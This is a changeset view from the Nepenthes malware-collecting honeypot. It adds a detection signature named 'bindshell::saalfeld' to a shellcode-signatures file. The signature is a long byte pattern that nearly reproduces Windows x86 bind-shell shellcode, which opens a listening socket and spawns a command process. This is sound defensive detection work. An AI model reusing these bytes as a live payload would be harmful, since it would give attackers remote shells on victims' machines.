Changeset 456

Show
Ignore:
Timestamp:
03/30/06 15:24:04 (3 years ago)
Author:
common
Message:

shellcode-signatures
- bindshell::saalfeld added

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved

  • nepenthes/trunk/modules/shellcode-signatures/shellcode-signatures.sc

    r445 r456  
    503503}; 
    504504 
     505 
     506bindshell::saalfeld 
     507{ 
     508        pattern 
     509        "\\xE9\\x19\\x02\\x00\\x00\\x5A\\x8B\\xDA\\x83\\xEB\\x07\\x6A\\xFF\\x53\\x64\\xA1" 
     510        "\\x00\\x00\\x00\\x00\\x50\\x64\\x89\\x25\\x00\\x00\\x00\\x00\\x33\\xDB\\xBB\\x00" 
     511        "\\x00\\xE0\\x77\\xE8\\xDC\\x01\\x00\\x00\\x81\\xFB\\x00\\x00\\xFF\\xBF\\x0F\\x83" 
     512        "\\xCE\\x01\\x00\\x00\\x81\\xC3\\x00\\x00\\x01\\x00\\x66\\x81\\x3B\\x4D\\x5A\\x75" 
     513        "\\xE7\\x33\\xC0\\x8B\\x43\\x3C\\x03\\xC3\\x66\\x81\\x38\\x50\\x45\\x75\\xD9\\x83" 
     514        "\\xC0\\x78\\x8B\\x30\\x03\\xF3\\x8B\\x4E\\x0C\\x03\\xCB\\x81\\x39\\x4B\\x45\\x52" 
     515        "\\x4E\\x75\\xC5\\x81\\x79\\x04\\x45\\x4C\\x33\\x32\\x75\\xBC\\x33\\xFF\\x8B\\x46" 
     516        "\\x20\\x03\\xC3\\x8B\\xCB\\x03\\x08\\x81\\x39\\x47\\x65\\x74\\x50\\x75\\x09\\x81" 
     517        "\\x79\\x04\\x72\\x6F\\x63\\x41\\x74\\x06\\x47\\x83\\xC0\\x04\\xEB\\xE5\\x03\\xFF" 
     518        "\\x03\\xFB\\x8B\\x56\\x24\\x03\\xFA\\x33\\xD2\\x66\\x8B\\x17\\x8B\\xFA\\x8B\\x46" 
     519        "\\x10\\x48\\x03\\xF8\\x33\\xC9\\x8B\\xCF\\x03\\xC9\\x03\\xC9\\x03\\x4E\\x1C\\x03" 
     520        "\\xCB\\x8B\\x39\\x03\\xFB\\xE9\\x69\\x01\\x00\\x00\\x5E\\x87\\xF7\\x8B\\xD7\\x33" 
     521        "\\xC0\\xF7\\xD0\\x8B\\xC8\\xF2\\xAF\\x89\\x32\\x8D\\x42\\x08\\x52\\x50\\x53\\xFF" 
     522        "\\x12\\x5A\\x89\\x42\\x04\\x8D\\x72\\x15\\x52\\x56\\xFF\\x52\\x04\\x5A\\x33\\xC0" 
     523        "\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x84\\xC9\\x74\\x09\\x52\\x56\\x53" 
     524        "\\xFF\\x12\\x5A\\xAB\\xE2\\xE8\\x46\\x52\\x56\\xFF\\x52\\x04\\x5A\\x8B\\xD8\\x33" 
     525        "\\xC0\\xAC\\x84\\xC0\\x75\\xF9\\x33\\xC9\\x8A\\x0E\\x80\\xF9\\x02\\x74\\x09\\x52" 
     526        "\\x56\\x53\\xFF\\x12\\x5A\\xAB\\xE2\\xE7\\x33\\xC0\\x50\\x40\\x50\\x40\\x50\\xFF" 
     527        "\\x57\\xE8\\x93\\x6A\\x10\\x56\\x53\\xFF\\x57\\xEC\\x6A\\x02\\x53\\xFF\\x57\\xF0" 
     528        "\\x33\\xC0\\x57\\x50\\xB0\\x0C\\xAB\\x58\\xAB\\x40\\xAB\\x5F\\x48\\x50\\x57\\x56" 
     529        "\\xAD\\x56\\xFF\\x57\\xC0\\x48\\x50\\x57\\xAD\\x56\\xAD\\x56\\xFF\\x57\\xC0\\x48" 
     530        "\\xB0\\x44\\x89\\x07\\x57\\xFF\\x57\\xC4\\x33\\xC0\\x8B\\x46\\xF4\\x89\\x47\\x3C" 
     531        "\\x89\\x47\\x40\\x8B\\x06\\x89\\x47\\x38\\x33\\xC0\\x66\\xB8\\x01\\x01\\x89\\x47" 
     532        "\\x2C\\x57\\x57\\x33\\xC0\\x50\\x50\\x50\\x40\\x50\\x48\\x50\\x50\\xAD\\x56\\x33" 
     533        "\\xC0\\x50\\xFF\\x57\\xC8\\xFF\\x76\\xF0\\xFF\\x57\\xCC\\xFF\\x76\\xFC\\xFF\\x57" 
     534        "\\xCC\\x48\\x50\\x50\\x53\\xFF\\x57\\xF4\\x8B\\xD8\\x33\\xC0\\xB4\\x04\\x50\\xC1" 
     535        "\\xE8\\x04\\x50\\xFF\\x57\\xD4\\x8B\\xF0\\x33\\xC0\\x8B\\xC8\\xB5\\x04\\x50\\x50" 
     536        "\\x57\\x51\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xD0\\x83\\x3F\\x01\\x7C\\x22\\x33\\xC0" 
     537        "\\x50\\x57\\xFF\\x37\\x56\\xFF\\x77\\xA8\\xFF\\x57\\xDC\\x0B\\xC0\\x74\\x2F\\x33" 
     538        "\\xC0\\x50\\xFF\\x37\\x56\\x53\\xFF\\x57\\xF8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xC8" 
     539        "\\x33\\xC0\\x50\\xB4\\x04\\x50\\x56\\x53\\xFF\\x57\\xFC\\x57\\x33\\xC9\\x51\\x50" 
     540        "\\x56\\xFF\\x77\\xAC\\xFF\\x57\\xD8\\x6A\\x50\\xFF\\x57\\xE0\\xEB\\xAA\\x50\\xFF" 
     541        "\\x57\\xE4\\xEB\\xFE\\x58\\x50\\x89\\x42\\xF2\\xC3\\x8B\\x44\\x24\\x0C\\x05\\xB8" 
     542        "\\x00\\x00\\x00\\xC7\\x00\\x78\\x56\\x34\\x12\\x33\\xC0\\xC3\\xEB\\xEC\\xE8\\xE2" 
     543        "\\xFD\\xFF\\xFF\\xE8\\x92\\xFE\\xFF\\xFF\\x4B\\x56\\xE7\\x77\\x23\\x80\\xE7\\x77" 
     544        "\\x4C\\x6F\\x61\\x64\\x4C\\x69\\x62\\x72\\x61\\x72\\x79\\x41\\x00\\x4B\\x45\\x52" 
     545        "\\x4E\\x45\\x4C\\x33\\x32\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x69\\x70\\x65" 
     546        "\\x00\\x47\\x65\\x74\\x53\\x74\\x61\\x72\\x74\\x75\\x70\\x49\\x6E\\x66\\x6F\\x41" 
     547        "\\x00\\x43\\x72\\x65\\x61\\x74\\x65\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x41\\x00" 
     548        "\\x43\\x6C\\x6F\\x73\\x65\\x48\\x61\\x6E\\x64\\x6C\\x65\\x00\\x50\\x65\\x65\\x6B" 
     549        "\\x4E\\x61\\x6D\\x65\\x64\\x50\\x69\\x70\\x65\\x00\\x47\\x6C\\x6F\\x62\\x61\\x6C" 
     550        "\\x41\\x6C\\x6C\\x6F\\x63\\x00\\x57\\x72\\x69\\x74\\x65\\x46\\x69\\x6C\\x65\\x00" 
     551        "\\x52\\x65\\x61\\x64\\x46\\x69\\x6C\\x65\\x00\\x53\\x6C\\x65\\x65\\x70\\x00\\x45" 
     552        "\\x78\\x69\\x74\\x50\\x72\\x6F\\x63\\x65\\x73\\x73\\x00\\x00\\x57\\x53\\x4F\\x43" 
     553        "\\x4B\\x33\\x32\\x00\\x73\\x6F\\x63\\x6B\\x65\\x74\\x00\\x62\\x69\\x6E\\x64\\x00" 
     554        "\\x6C\\x69\\x73\\x74\\x65\\x6E\\x00\\x61\\x63\\x63\\x65\\x70\\x74\\x00\\x73\\x65" 
     555        "\\x6E\\x64\\x00\\x72\\x65\\x63\\x76\\x00\\x02\\x00(..)"; 
     556        mapping (none,port); 
     557         
     558//      reference "http://nepenthes.mwcollect.org/csni:shellcodes:saalfeld"; 
     559}; 
    505560 
    506561connectbackshell::mandragore 
     
    9561011 
    9571012 
     1013